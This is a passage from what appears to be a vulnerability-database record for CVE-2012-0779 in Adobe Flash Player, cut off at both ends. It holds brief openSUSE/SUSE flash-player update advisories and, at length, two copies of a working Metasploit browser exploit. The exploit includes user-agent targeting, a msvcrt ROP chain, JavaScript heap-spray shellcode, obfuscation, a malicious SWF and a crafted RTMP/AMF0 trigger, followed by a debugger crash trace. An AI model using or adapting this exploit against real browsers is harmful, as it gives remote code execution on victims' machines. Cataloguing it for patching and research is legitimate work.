::Timeout::timeout(timeout) {\n while buf.length < size\n buf << cli.get_once(size - buf.length)\n end\n }\n buf\n end\n\n def do_handshake(cli)\n c0 = my_read(cli, 1)\n c1 = my_read(cli, 1536) # HandshakeSize => 1536\n s0 = \"\\3\" # s0\n s1 = Rex::Text.rand_text(4) # s1.time\n s1 << \"\\x00\\x00\\x00\\x00\" # s1.zero\n s1 << Rex::Text.rand_text(1528) # s1.random_data\n s2 = c1 # s2\n cli.put(s0)\n cli.put(s1)\n cli.put(s2)\n c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)\n end\n\n def on_rtmp_connect(cli)\n\n begin\n do_handshake(cli)\n request = my_read(cli, 341) # connect request length\n\n case request\n when /connect/\n rtmp_header = \"\\x03\" # Chunk Stream ID\n rtmp_header << \"\\x00\\x00\\x00\" # Timestamp\n rtmp_header << \"\\x00\\x00\\x71\" # Body Size\n rtmp_header << \"\\x14\" # AMF0 Command\n rtmp_header << \"\\x00\\x00\\x00\\x00\" # Stream ID\n\n # String\n rtmp_body = \"\\x02\" # String\n rtmp_body << \"\\x00\\x06\" # String length\n rtmp_body << \"\\x5f\\x65\\x72\\x72\\x6f\\x72\" # String: _error\n # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << \"\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # Number\n # Array\n rtmp_body << \"\\x0a\" # AMF Type: Array\n rtmp_body << \"\\x00\\x00\\x00\\x05\" # Array length: 5\n # Array elements\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n # Crafter Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x0c\\x0c\\x0c\\x0c\" # Modify the \"\\x0c\\x0c\\x0c\\x0c\" to do an arbitrary call\n # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n # Number\n rtmp_body << \"\\x00\" # AMF Type: Number\n rtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\n\n trigger = rtmp_header\n trigger << rtmp_body\n\n cli.put(trigger)\n @rtmp_listener.close_client(cli)\n end\n rescue\n ensure\n @rtmp_listener.close_client(cli)\n remove_socket(cli)\n end\n\n end\n\n def cleanup\n super\n return if not @rtmp_listener\n\n begin\n @rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)\n if @rtmp_listener.kind_of?(Rex::Socket)\n @rtmp_listener.close\n @rtmp_listener.stop\n end\n @rtmp_listener = nil\n rescue ::Exception\n end\n end\n\n def on_request_uri(cli, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n print_status(\"Client requesting: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status(\"Sending Exploit SWF\")\n send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })\n return\n end\n\n p = payload.encoded\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\n\n if not my_target['Rop'].nil?\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\n js = get_aligned_spray(my_target, js_rop, js_nops)\n else\n js = get_easy_spray(my_target, js_code, js_nops)\n end\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\n swf_uri << \"/#{rand_text_alpha(rand(6)+3)}.swf\"\n\n if datastore['RTMPHOST'] == '0.0.0.0'\n rtmp_host = Rex::Socket.source_address('1.2.3.4')\n else\n rtmp_host = datastore['RTMPHOST']\n end\n\n rtmp_port = datastore['RTMPPORT']\n\n html = %Q|\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <center>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"\n id=\"test\" width=\"1\" height=\"1\"\n codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{swf_uri}\" />\n <param name=\"FlashVars\" value=\"var1=#{rtmp_host}&var2=#{rtmp_port}\"\n <embed src=\"#{swf_uri}\" quality=\"high\"\n width=\"1\" height=\"1\" name=\"test\" align=\"middle\"\n allowNetworking=\"all\"\n type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\"\n FlashVars=\"var1=#{rtmp_host}&var2=#{rtmp_port}\">\n </embed>\n\n </object>\n </center>\n\n </body>\n </html>\n |\n\n html = html.gsub(/^ {4}/, '')\n\n print_status(\"Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2012-0779.swf\" )\n fd = ::File.open( path, \"rb\" )\n swf = fd.read(fd.stat.size)\n fd.close\n\n return swf\n end\nend\n\n=begin\n\n* Flash Player 11.2.202.228\n\n(348.540): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000\neip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\nds:0023:44444470=????????\n\n0:000> u eip\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\n104b1b30 53 push ebx\n104b1b31 ffd0 call eax\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flash_rtmp.rb"}], "suse": [{"lastseen": "2016-09-04T12:22:34", "bulletinFamily": "unix", "description": "flash-player update to 11.2.202.235 fixes a potential\n remote code execution vulnerability\n\n", "modified": "2012-05-08T14:08:27", "published": "2012-05-08T14:08:27", "id": "OPENSUSE-SU-2012:0594-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00005.html", "type": "suse", "title": "update for flash-player (critical)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:35", "bulletinFamily": "unix", "description": "Flash Player was updated to version 11.2.202.233, fixing a\n critical security problem.\n\n This update also fixes a problem with NVIDIA accelerated\n drivers and swapped blue/red colors, and also a printing\n regression introduced by a previous update.\n", "modified": "2012-05-20T03:08:21", "published": "2012-05-20T03:08:21", "id": "SUSE-SU-2012:0592-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00004.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "description": "Flash Player was updated to version 11.2.202.233, fixing a\n critical security problem.\n", "modified": "2012-05-08T17:08:45", "published": "2012-05-08T17:08:45", "id": "SUSE-SU-2012:0592-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00006.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T11:41:13", "bulletinFamily": "exploit", "description": "Adobe Flash Player Object Type Confusion. CVE-2012-0779. Remote exploit for windows platform", "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "EDB-ID:19369", "href": "https://www.exploit-db.com/exploits/19369/", "type": "exploitdb", "title": "Adobe Flash Player Object Type Confusion", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => \"6.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:method => \"GetVariable\",\r\n\t\t:classid => \"ShockwaveFlash.ShockwaveFlash\",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Adobe Flash Player Object Type Confusion\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a vulnerability found in Adobe Flash\r\n\t\t\t\tPlayer. By supplying a corrupt AMF0 \"_error\" response, it\r\n\t\t\t\tis possible to gain arbitrary remote code execution under\r\n\t\t\t\tthe context of the user.\r\n\r\n\t\t\t\tThis vulnerability has been exploited in the wild as part of\r\n\t\t\t\tthe \"World Uyghur Congress Invitation.doc\" e-mail attack.\r\n\t\t\t\tAccording to the advisory, 10.3.183.19 and 11.x before\r\n\t\t\t\t11.2.202.235 are affected.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0779' ],\r\n\t\t\t\t\t[ 'OSVDB', '81656'],\r\n\t\t\t\t\t[ 'BID', '53395' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t#'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Flash Player 11.2.202.228\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 6 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => nil,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '0x0'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 7 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => nil,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '0x0'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '238',\r\n\t\t\t\t\t\t\t'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"May 04 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),\r\n\t\t\t\tOptAddress.new('RTMPHOST', [ true, \"The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0\", '0.0.0.0' ]),\r\n\t\t\t\tOptPort.new('RTMPPORT', [ true, \"The local port to RTMP service listen on.\", 1935 ]),\r\n\t\t\t], self.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n\t\t\treturn targets[1] #IE 6 on Windows XP SP3\r\n\t\telsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n\t\t\treturn targets[2] #IE 7 on Windows XP SP3\r\n\t\telsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[3] #IE 8 on Windows XP SP3\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef ret(t)\r\n\t\treturn [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\r\n\tend\r\n\r\n\tdef popret(t)\r\n\t\treturn [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\r\n\tend\r\n\r\n\tdef get_rop_chain(t)\r\n\r\n\t\t# ROP chains generated by mona.py - See corelan.be\r\n\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\trop =\r\n\t\t\t[\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\tjunk,\r\n\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t0x77c4ec00, # POP EBP # RETN\r\n\t\t\t\t0x77c35459, # ptr to 'push esp # ret'\r\n\t\t\t\t0x77c47705, # POP EBX # RETN\r\n\t\t\t\t0x00001000, # EBX\r\n\t\t\t\t0x77c3ea01, # POP ECX # RETN\r\n\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t0x77c46100, # POP EDI # RETN\r\n\t\t\t\t0x77c46101, # ROP NOP (-> edi)\r\n\t\t\t\t0x77c4d680, # POP EDX # RETN\r\n\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t0x77c4e392, # POP EAX # RETN\r\n\t\t\t\tnop, # NOPS (-> eax)\r\n\t\t\t\t0x77c12df9, # PUSHAD # RETN\r\n\t\t\t].pack(\"V*\")\r\n\r\n\t\tcode = ret(t)\r\n\t\tcode << rand_text(119)\r\n\t\tcode << rop\r\n\t\tcode << \"\\xbc\\x0c\\x0c\\x0c\\x0c\" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem\r\n\t\tcode << payload.encoded\r\n\t\toffset = 2616 - code.length\r\n\t\tcode << rand_text(offset)\r\n\t\tcode << [ t['StackPivot'] ].pack(\"V\")\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef get_easy_spray(t, js_code, js_nops)\r\n\r\n\t\tspray = <<-JS\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar offset = nops.substring(0, #{t['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n\t\theap_obj.gc();\r\n\t\tfor (var z=1; z < 0x185; z++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\r\n\t\tJS\r\n\r\n\t\treturn spray\r\n\r\n\tend\r\n\r\n\r\n\tdef get_aligned_spray(t, js_rop, js_nops)\r\n\r\n\t\tspray = <<-JS\r\n\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\t\tvar rop_chain = unescape(\"#{js_rop}\");\r\n\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\r\n\t\tvar offset = nops.substring(0, #{t['Offset']});\r\n\t\tvar shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);\r\n\r\n\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n\t\theap_obj.gc();\r\n\t\tfor (var z=1; z < 0x1c5; z++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\r\n\t\tJS\r\n\r\n\t\treturn spray\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@swf = create_swf\r\n\r\n\t\t# Boilerplate required to handled pivoted listeners\r\n\t\tcomm = datastore['ListenerComm']\r\n\t\tif comm == \"local\"\r\n\t\t\tcomm = ::Rex::Socket::Comm::Local\r\n\t\telse\r\n\t\t\tcomm = nil\r\n\t\tend\r\n\r\n\t\t@rtmp_listener = Rex::Socket::TcpServer.create(\r\n\t\t\t'LocalHost' => datastore['RTMPHOST'],\r\n\t\t\t'LocalPort' => datastore['RTMPPORT'],\r\n\t\t\t'Comm' => comm,\r\n\t\t\t'Context' => {\r\n\t\t\t\t'Msf' => framework,\r\n\t\t\t\t'MsfExploit' => self,\r\n\t\t\t}\t\r\n\t\t)\r\n\t\t\t\t\r\n\t\t# Register callbacks\r\n\t\t@rtmp_listener.on_client_connect_proc = Proc.new { |cli|\r\n\t\t\tadd_socket(cli)\r\n\t\t\tprint_status(\"#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP\")\r\n\t\t\ton_rtmp_connect(cli)\r\n\t\t}\r\n\r\n\t\t@rtmp_listener.start\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef my_read(cli,size,timeout=nil)\r\n\t\tif timeout.nil?\r\n\t\t\ttimeout = cli.def_read_timeout\r\n\t\tend\r\n\r\n\t\tbuf = \"\"\r\n\t\t::Timeout::timeout(timeout) {\r\n\t\t\twhile buf.length < size\r\n\t\t\tbuf << cli.get_once(size - buf.length)\r\n\t\t\tend\r\n\t\t}\r\n\t\tbuf\r\n\tend\r\n\r\n\tdef do_handshake(cli)\r\n\t\tc0 = my_read(cli, 1)\r\n\t\tc1 = my_read(cli, 1536) # HandshakeSize => 1536\r\n\t\ts0 = \"\\3\" # s0\r\n\t\ts1 = Rex::Text.rand_text(4) # s1.time\r\n\t\ts1 << \"\\x00\\x00\\x00\\x00\" # s1.zero\r\n\t\ts1 << Rex::Text.rand_text(1528) # s1.random_data\r\n\t\ts2 = c1 # s2\r\n\t\tcli.put(s0)\r\n\t\tcli.put(s1)\r\n\t\tcli.put(s2)\r\n\t\tc2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)\r\n\tend\r\n\r\n\tdef on_rtmp_connect(cli)\r\n\r\n\t\tbegin\r\n\t\t\tdo_handshake(cli)\r\n\t\t\trequest = my_read(cli, 341) # connect request length\r\n\r\n\t\t\tcase request\r\n\t\t\twhen /connect/\r\n\t\t\t\trtmp_header = \"\\x03\" # Chunk Stream ID\r\n\t\t\t\trtmp_header << \"\\x00\\x00\\x00\" # Timestamp\r\n\t\t\t\trtmp_header << \"\\x00\\x00\\x71\" # Body Size\r\n\t\t\t\trtmp_header << \"\\x14\" # AMF0 Command\r\n\t\t\t\trtmp_header << \"\\x00\\x00\\x00\\x00\" # Stream ID\r\n\r\n\t\t\t\t# String\r\n\t\t\t\trtmp_body = \"\\x02\" # String\r\n\t\t\t\trtmp_body << \"\\x00\\x06\" # String length\r\n\t\t\t\trtmp_body << \"\\x5f\\x65\\x72\\x72\\x6f\\x72\" # String: _error\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << \"\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\t# Array\r\n\t\t\t\trtmp_body << \"\\x0a\" # AMF Type: Array\r\n\t\t\t\trtmp_body << \"\\x00\\x00\\x00\\x05\" # Array length: 5\r\n\t\t\t\t# Array elements\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\t# Crafter Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x0c\\x0c\\x0c\\x0c\" # Modify the \"\\x0c\\x0c\\x0c\\x0c\" to do an arbitrary call\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\t\t\t\t# Number\r\n\t\t\t\trtmp_body << \"\\x00\" # AMF Type: Number\r\n\t\t\t\trtmp_body << [rand(0x40000000)].pack(\"V\") + \"\\x00\\x00\\x00\\x00\" # Number\r\n\r\n\t\t\t\ttrigger = rtmp_header\r\n\t\t\t\ttrigger << rtmp_body\r\n\r\n\t\t\t\tcli.put(trigger)\r\n\t\t\t\t@rtmp_listener.close_client(cli)\r\n\t\t\tend\r\n\t\trescue\r\n\t\tensure\r\n\t\t\t@rtmp_listener.close_client(cli)\r\n\t\t\tremove_socket(cli)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef cleanup\r\n\t\tsuper\r\n\t\treturn if not @rtmp_listener\r\n\t\t\r\n\t\tbegin\r\n\t\t\t@rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)\r\n\t\t\tif @rtmp_listener.kind_of?(Rex::Socket)\r\n\t\t\t\t@rtmp_listener.close\r\n\t\t\t\t@rtmp_listener.stop\r\n\t\t\tend\r\n\t\t\t@rtmp_listener = nil\r\n\t\trescue ::Exception\r\n\t\tend\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"Client requesting: #{request.uri}\")\r\n\r\n\t\tif request.uri =~ /\\.swf$/\r\n\t\t\tprint_status(\"Sending Exploit SWF\")\r\n\t\t\tsend_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tp = payload.encoded\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\r\n\r\n\t\tif not my_target['Rop'].nil?\r\n\t\t\tjs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\r\n\t\t\tjs = get_aligned_spray(my_target, js_rop, js_nops)\r\n\t\telse\r\n\t\t\tjs = get_easy_spray(my_target, js_code, js_nops)\r\n\t\tend\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\tswf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\r\n\t\tswf_uri << \"/#{rand_text_alpha(rand(6)+3)}.swf\"\r\n\r\n\t\tif datastore['RTMPHOST'] == '0.0.0.0'\r\n\t\t\trtmp_host = Rex::Socket.source_address('1.2.3.4')\r\n\t\telse\r\n\t\t\trtmp_host = datastore['RTMPHOST']\r\n\t\tend\r\n\r\n\t\trtmp_port = datastore['RTMPPORT']\r\n\r\n\t\thtml = %Q|\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js}\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<center>\r\n\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"\r\n\t\tid=\"test\" width=\"1\" height=\"1\"\r\n\t\tcodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t<param name=\"movie\" value=\"#{swf_uri}\" />\r\n\t\t<param name=\"FlashVars\" value=\"var1=#{rtmp_host}&var2=#{rtmp_port}\"\r\n\t\t<embed src=\"#{swf_uri}\" quality=\"high\"\r\n\t\twidth=\"1\" height=\"1\" name=\"test\" align=\"middle\"\r\n\t\tallowNetworking=\"all\"\r\n\t\ttype=\"application/x-shockwave-flash\"\r\n\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\"\r\n\t\tFlashVars=\"var1=#{rtmp_host}&var2=#{rtmp_port}\">\r\n\t\t</embed>\r\n\r\n\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status(\"Sending html\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\n\tdef create_swf\r\n\t\tpath = ::File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2012-0779.swf\" )\r\n\t\tfd = ::File.open( path, \"rb\" )\r\n\t\tswf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\treturn swf\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Flash Player 11.2.202.228\r\n\r\n(348.540): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000\r\neip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 